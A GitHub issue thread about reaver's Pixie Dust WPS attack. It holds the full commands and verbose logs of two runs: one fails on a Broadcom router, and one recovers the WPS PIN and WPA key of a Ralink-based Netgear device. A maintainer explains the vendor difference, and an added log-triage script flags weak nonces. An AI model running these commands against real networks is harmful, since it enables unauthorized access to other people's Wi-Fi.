t6x / reaver-wps-fork-t6x


2 pixie attacks same kind of output but 1 out of 2 successful #345

Closed algreen702021 closed 3 years ago

algreen702021 commented 3 years ago

A) technicolor 789vac v2 - No success

reaver -i wlan1 -c 112 -b  XX XX XX:8B:26:44 -vvv -L -N -K                                                                  130 ⨯

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1 to channel 112
[+] Waiting for beacon from XX XX XX:8B:26:44
[+] Received beacon from XX XX XX:8B:26:44
[+] Vendor: Broadcom
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with XX XX XX:8B:26:44 (ESSID: tech-234431)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=407 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 1d a5 f2 67 ba e1 5c d9 a0 49 fb ee 1c 4a 72 53
WPS: Enrollee MAC Address a6:91:b1:8b:26:44
WPS: Enrollee Nonce - hexdump(len=16): 16 fa 86 5d 41 b7 69 5e 91 c4 ff 5b 4a 77 a2 1d
WPS: Enrollee Authentication Type flags 0x23
WPS: No match in supported authentication types (own 0x0 Enrollee 0x23)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xd
WPS: No match in supported encryption types (own 0x0 Enrollee 0xd)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x268c [Label] [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=11):
     54 65 63 68 6e 69 63 6f 6c 6f 72                  Technicolor     
WPS: Model Name - hexdump_ascii(len=14):
     4d 65 64 69 61 41 63 63 65 73 73 20 54 47         MediaAccess TG  
WPS: Model Number - hexdump_ascii(len=9):
     37 38 39 76 61 63 20 76 32                        789vac v2       
WPS: Serial Number - hexdump_ascii(len=9):
     31 38 33 38 55 41 30 4b 41                        1838UA0KA       
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=7):
     41 47 43 4f 4d 42 4f                              AGCOMBO         
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): a2 51 69 11 2e c1 9e bd 94 b6 54 43 b9 2b d1 a0
WPS: UUID-R - hexdump(len=16): 17 46 85 02 ed 02 ae 3e 5a b8 ae cb a4 7d e0 00
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
WPS: DHKey - hexdump(len=32): 67 35 fa 65 bc 9c 4a 4e 8b ba 32 3d d0 14 fd 50 ac 61 e9 f9 c3 41 22 9b 85 d1 c1 c2 16 f3 46 6c
WPS: KDK - hexdump(len=32): dc bb b8 2f 93 95 64 9d ba 92 5b 87 14 51 9e d6 1a f8 c0 c0 d0 a9 28 b0 61 4a 78 c6 61 51 50 66
WPS: AuthKey - hexdump(len=32): 59 a0 4e 42 28 66 30 9c 03 aa a4 76 99 82 0d cc 0e 1c 68 7f 46 59 4d 1b f4 0e fc 7e 51 78 3c b7
WPS: KeyWrapKey - hexdump(len=16): 0d 21 fa 32 fe d7 2f 4b 99 2d d6 e9 6e 5d ec 6d
WPS: EMSK - hexdump(len=32): 45 2a b5 d9 91 e4 d6 de 9c 33 d9 24 13 24 2b 71 40 6d 8a ed 7b 85 4b a6 7f 5a 98 3d e5 a5 b3 d0
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 4d 5d f1 ea b0 3a 25 8e 73 57 88 de 0b 19 40 ff 71 be 14 6b 96 1e 32 ec 6c 2e 25 d4 cd 83 1c b0
WPS: E-Hash2 - hexdump(len=32): 61 4f dc f6 f7 ad be d3 1e bf ec 57 48 22 78 a8 de 86 e6 55 c0 6c f0 4c a4 ba 9d d6 9e bf 58 df
executing pixiewps -e 050f7def7379feffc1c31bda34158ca60a84b16fe9abc25d1f1d3c1e277620392482865ffba9e81fcf543571bcb8092e6f4b92826b9d25502c80e8b7a5ade317a7088ed614956e2e5c72f837fb08791aacc8d82a2969fd6e5c9c19239db2daa8b45ca824b7d5ecef7c7bb7f5e154214a4a338d51d312d66bbb856f02f6cd03edf60996f46c96a0a88d0f702dea88a1ccf03527217685e93eac326c5fb8c6d5198e7bb24398870b5a62a24641a4861e7598856639f0f2ae60ac881bf31da84340 -s 4d5df1eab03a258e735788de0b1940ff71be146b961e32ec6c2e25d4cd831cb0 -z 614fdcf6f7adbed31ebfec57482278a8de86e655c06cf04ca4ba9dd69ebf58df -a 59a04e422866309c03aaa47699820dcc0e1c687f46594d1bf40efc7e51783cb7 -n 16fa865d41b7695e91c4ff5b4a77a21d -r 548f0fcd9d434771c6787d171e3c1552bb08131c1d6a3120b5ad634f7f5e0a564f4f04605eb40f9f9638697c6f6cee10d73f2ee0a3c39e5e852a199e624be975926998b0c2ce9bf851b731a26214064bcac8e88590a8a4914d8fe3d324f1b2212e7ea4e2862767a1f2fd197ecc6c5c809a3cba9760274a422cbccfe171aac8f1769af2a93140b52c59065bea1dd1fed82333b8e84b0c5b5a340f7f4a912c731d85d8aba0c84d538ea0efc4b03ebe1b755d640724fca532af0d56c27e89631209

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 170 ms

[-] Pixiewps fail, sending WPS NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116

B) Netgear WN3000RP : Successful pin recovery

sudo reaver -i wlan1 -c 6 -b   A0:40:A0:6C:BB:6F  -vvv -L -N -K                                                                    1 ⨯

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1 to channel 6
[?] Restore previous session for A0:40:A0:6C:BB:6F? [n/Y] n
[+] Waiting for beacon from A0:40:A0:6C:BB:6F
[+] Received beacon from A0:40:A0:6C:BB:6F
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from resend_last_packet() send.c:161
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with A0:40:A0:6C:BB:6F (ESSID: tp-linkAD234CBA)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=406 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 28 80 28 80 28 80 18 80 a8 80 a0 40 a0 6c bb 6f
WPS: Enrollee MAC Address a0:40:a0:6c:bb:6f
WPS: Enrollee Nonce - hexdump(len=16): 8a 09 53 f8 9c e8 a6 46 79 d9 a8 80 dd 08 7f b0
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=4):
     4e 54 47 52                                       NTGR            
WPS: Model Name - hexdump_ascii(len=8):
     57 4e 33 30 30 30 52 50                           WN3000RP        
WPS: Model Number - hexdump_ascii(len=2):
     56 33                                             V3              
WPS: Serial Number - hexdump_ascii(len=12):
     61 30 34 30 61 30 36 63 62 62 36 66               a040a06cbb6f    
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=23):
     57 4e 33 30 30 30 52 50 76 33 28 57 69 72 65 6c   WN3000RPv3(Wirel
     65 73 73 20 41 50 29                              ess AP)         
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): ee 0d 75 2f 66 3d d2 0d cf 89 e4 b6 4e 50 d7 13
WPS: UUID-R - hexdump(len=16): c4 23 4c 61 7d 23 3d 46 c6 ff ac a9 c4 97 c7 0e
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
WPS: DHKey - hexdump(len=32): 1a 00 8d 4e eb b7 cc 13 b2 60 15 83 93 02 2e e6 c2 12 ac b1 d3 8f 1e e6 01 1d 4e 48 5b 4d bd 89
WPS: KDK - hexdump(len=32): 9b 80 bb 4a 17 7c 19 99 84 05 c3 ce ca 17 7a 8c 2e da e6 75 56 37 23 0e 07 0c 07 37 d0 4a 3d 3b
WPS: AuthKey - hexdump(len=32): f5 50 7d dc 01 c2 10 4d 92 fa 78 ef c9 ed 98 88 de ea ec 2f f3 bf 95 8e ee d7 35 76 36 6d 41 e4
WPS: KeyWrapKey - hexdump(len=16): ab 04 3d 17 1b f8 c1 4a 3d 98 3f 0b 9c 97 4b db
WPS: EMSK - hexdump(len=32): 2b e4 be 26 b0 88 31 b2 ab cf 0c 1c f0 8c 18 ef 24 09 5e c5 f0 73 58 40 88 c2 58 11 af 96 21 97
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 83 1c 77 ec 56 d6 17 70 c3 a0 23 27 0c 7a 12 58 28 7a 22 0d 15 ad a9 b2 d1 9d 2e 36 5c 19 84 3e
WPS: E-Hash2 - hexdump(len=32): 88 30 3d ac 90 d1 f4 ce ac e3 48 06 4a c1 ed c9 d0 59 13 7b e3 4c bb b3 d1 c2 8a 90 78 00 4d 28
executing pixiewps -e a074ad2e4de786d8c0b212a99fa3be24ac682d67489cde27dbda3a7e0041669581cab18d9f4baf43ca32811da7016d0997696d6ee7f31ac615f4faca62e9546ed61ed520846610df9c059980f9e9251afaee9cf3a85123792f19e3acf7a45f22a8a94a6ada72b4fe6a94f50ea48db1b907c558314e42dde510df6a56b0adb835fb18536d5e2bb9fb3e1f038f917af8b6e077e5a4be39e211cfe26c4479b2e0551a8dddd9f44dd8c64593a007bf9c11e6bd80662cd8358e5a9ad02f50eb8601f3 -s 831c77ec56d61770c3a023270c7a1258287a220d15ada9b2d19d2e365c19843e -z 88303dac90d1f4ceace348064ac1edc9d059137be34cbbb3d1c28a9078004d28 -a f5507ddc01c2104d92fa78efc9ed9888deeaec2ff3bf958eeed73576366d41e4 -n 8a0953f89ce8a64679d9a880dd087fb0 -r 18d5cf9aa2c40ec003be8e0f7527691b0dddb9c9f2715d0893cdcff86436c160c3b012249a5dc51cf3831fd3c3fd66031080e74b5ce48e7e54f83450e310e7148d01ffc4deb629a406825f966a3d6cbbfd74302f46cb4aca889d9128dde19421d69909008b5169edb1008b8b67483bd486e76385fd8b1804428dc8b30ff4b97171706028023c33e35bbc795cf02143b2033c65c7d4b0a1f571c2a7142d142e882d6b70aefc99c700c55987aef2c54fa0758580f9222ea6f08d2350edd460733a

 Pixiewps 1.4

 [?] Mode:     1 (RT/MT/CL)
 [*] Seed N1:  0xd178e0e7
 [*] Seed ES1: 0x00000000
 [*] Seed ES2: 0x00000000
 [*] PSK1:     8865fdd8300c5adfbf4fd6ec51d78c86
 [*] PSK2:     1c7ac09e53040f16e14838c4016beb31
 [*] ES1:      00000000000000000000000000000000
 [*] ES2:      00000000000000000000000000000000
 [+] WPS pin:  39801296

 [*] Time taken: 0 s 32 ms

[+] Pixiewps: success: setting pin to 39801296
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 39801296
WPS: Device Password - hexdump_ascii(len=8):
     33 39 38 30 31 32 39 36                           39801296        
WPS: PSK1 - hexdump(len=16): 88 65 fd d8 30 0c 5a df bf 4f d6 ec 51 d7 8c 86
WPS: PSK2 - hexdump(len=16): 1c 7a c0 9e 53 04 0f 16 e1 48 38 c4 01 6b eb 31
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 04 e1 67 ee 24 54 79 f8 81 3e e0 d7 57 d9 fa af
WPS: R-S2 - hexdump(len=16): ec c0 f3 b6 ca da 7e 3f 5c 9e 74 63 65 2b cb e9
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): b3 f8 4d d2 07 b0 e8 61 6e e6 4a 64 47 10 af 75 ae 85 bf 96 12 a6 73 a2 a9 f3 96 5d ef 5a 02 9c
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 5a 70 f7 a7 22 dd 2f c8 30 2e 56 63 b7 65 a9 12 44 3e 2d 9c 89 4a 69 e3 7e ff b8 b4 6c 23 9e 35
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=120 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M5
WPS: Processing decrypted Encrypted Settings attribute
WPS: E-SNonce1 - hexdump(len=16): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
WPS: Enrollee proved knowledge of the first half of the device password
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M5 message
WPS: Building Message M6
WPS:  * Version
WPS:  * Message Type (10)
WPS:  * Enrollee Nonce
WPS:  * R-SNonce2
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M6 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=168 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M7
WPS: Processing decrypted Encrypted Settings attribute
WPS: E-SNonce2 - hexdump(len=16): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
WPS: Enrollee proved knowledge of the second half of the device password
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): 28 80 28 80 28 80 18 80 a8 80 a0 40 a0 6c bb 6f
WPS: Processing AP Settings
WPS: SSID - hexdump_ascii(len=15):
     74 70 2d 6c 69 6e 6b 41 44 32 33 34 43 42 41      tp-linkAD234CBA 
WPS: Authentication Type: 0x20
WPS: Encryption Type: 0x8
WPS: Network Key Index: 1
WPS: Network Key - hexdump(len=8): 31 32 33 34 35 36 37 38
WPS: MAC Address a0:40:a0:6c:bb:6f
WPS: Update local configuration based on the AP configuration
WPS: Processing AP Settings
WPS: SSID - hexdump_ascii(len=15):
     74 70 2d 6c 69 6e 6b 41 44 32 33 34 43 42 41      tp-linkAD234CBA 
WPS: Authentication Type: 0x20
WPS: Encryption Type: 0x8
WPS: Network Key Index: 1
WPS: Network Key - hexdump(len=8): 31 32 33 34 35 36 37 38
WPS: MAC Address a0:40:a0:6c:bb:6f
WPS: Update local configuration based on the AP configuration
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M7 message
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[+] Updated P1 array
[+] Updated P2 array
[+] Quitting after pixiewps attack
[+] Pin cracked in 6 seconds
[+] WPS PIN: '39801296'
[+] WPA PSK: '12345678'
[+] AP SSID: 'tp-linkAD234CBA'

Using RT8812au chipset, same results with Alfa AW036nHA and Alfa AC1900 8814au.
Any clue? Regards

kcdtv commented 3 years ago

The first attack is against a Broadcom device (--mode 1). Only a few devices are supported (by "device" I mean access points) and the attack will probably fail (like in your case). The second attack is against a Mediatek device (previously called Ralink). It is highly effective and immediate.
For more information, refer to the pixie dust thread (in the Kali forum) and Dominique Bongard's full disclosure.
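
An added example, not part of the thread or of reaver's own code: a small Python triage script that summarises `reaver -vvv -K` output per run, so the vendor difference described above and the all-zero secret nonces visible in run B appear side by side. The sample log is constructed from abbreviated lines in the format of the two runs; the function and field names are assumptions of this example.

```python
import re

# Constructed sample: abbreviated lines in the format of runs A and B above.
SAMPLE_LOG = """\
Reaver v1.6.6 WiFi Protected Setup Attack Tool
[+] Vendor: Broadcom
WPS: Manufacturer - hexdump_ascii(len=11):
     54 65 63 68 6e 69 63 6f 6c 6f 72                  Technicolor
 [-] WPS pin not found!
[-] Pixiewps fail, sending WPS NACK
Reaver v1.6.6 WiFi Protected Setup Attack Tool
[+] Vendor: RalinkTe
WPS: Device Name - hexdump_ascii(len=23):
     57 4e 33 30 30 30 52 50 76 33 28 57 69 72 65 6c   WN3000RPv3(Wirel
     65 73 73 20 41 50 29                              ess AP)
 [*] Seed ES1: 0x00000000
 [*] ES1:      00000000000000000000000000000000
 [*] ES2:      00000000000000000000000000000000
[+] Pixiewps: success: setting pin to <redacted>
WPS: E-SNonce1 - hexdump(len=16): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
"""

HEX_ASCII = re.compile(
    r"^WPS: (Manufacturer|Model Name|Model Number|Device Name)"
    r" - hexdump_ascii\(len=(\d+)\):")
# Secret nonces as printed by pixiewps (ES1/ES2) or by reaver after M5/M7.
NONCE = re.compile(
    r"(?:E-SNonce[12] - hexdump\(len=16\):|\[\*\] ES[12]:)\s+((?:[0-9a-f]{2} ?)+)$")
BYTE = re.compile(r"^[0-9a-f]{2}$")


def _decode_ascii_dump(lines, start, length):
    """Decode `length` bytes from the hexdump_ascii rows starting at `start`.

    Rows hold at most 16 bytes followed by an ASCII column, and long values
    (such as Device Name in run B) continue on the next row.
    """
    out = bytearray()
    for row in lines[start:]:
        got = 0
        for tok in row.split():
            if got == 16 or len(out) == length or not BYTE.match(tok):
                break  # reached the ASCII column or the declared length
            out.append(int(tok, 16))
            got += 1
        if got == 0 or len(out) == length:
            break  # truncated dump or value complete
    return out.decode("ascii", "replace")


def summarize_runs(log_text):
    """Return one dict per reaver run: vendor, device strings, pixiewps result."""
    lines = log_text.splitlines()
    runs, cur = [], None
    for i, line in enumerate(lines):
        s = line.strip()
        if s.startswith("Reaver v"):  # banner marks the start of a run
            cur = {"vendor": None, "pixiewps": "not run", "secret_nonces": []}
            runs.append(cur)
        elif cur is None:
            continue
        elif s.startswith("[+] Vendor:"):
            cur["vendor"] = s.split(":", 1)[1].strip()
        elif (m := HEX_ASCII.match(s)):
            cur[m.group(1)] = _decode_ascii_dump(lines, i + 1, int(m.group(2)))
        elif s.startswith("[-] Pixiewps fail"):
            cur["pixiewps"] = "fail"
        elif s.startswith("[+] Pixiewps: success"):
            cur["pixiewps"] = "success"
        elif (m := NONCE.search(s)):
            cur["secret_nonces"].append(m.group(1).replace(" ", ""))
    for r in runs:
        n = r["secret_nonces"]
        # E-S1/E-S2 are meant to be random; all zeros marks firmware that
        # should be updated or have the WPS PIN method disabled.
        r["zero_secret_nonces"] = bool(n) and all(set(v) == {"0"} for v in n)
    return runs


if __name__ == "__main__":
    for r in summarize_runs(SAMPLE_LOG):
        print(r["vendor"], r["pixiewps"], "zero nonces:", r["zero_secret_nonces"])
```

The summary deliberately leaves out the recovered PIN and network key, so it can be attached to an audit report as-is.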

ChillVibesMushroom commented 2 years ago

The first attack is against a Broadcom device (--mode 1). Only a few devices are supported (by "device" I mean access points) and the attack will probably fail (like in your case). The second attack is against a Mediatek device (previously called Ralink). It is highly effective and immediate. For more information, refer to the pixie dust thread (in the Kali forum) and Dominique Bongard's full disclosure.

How long did it take?

kcdtv commented 2 years ago

I don't understand your question...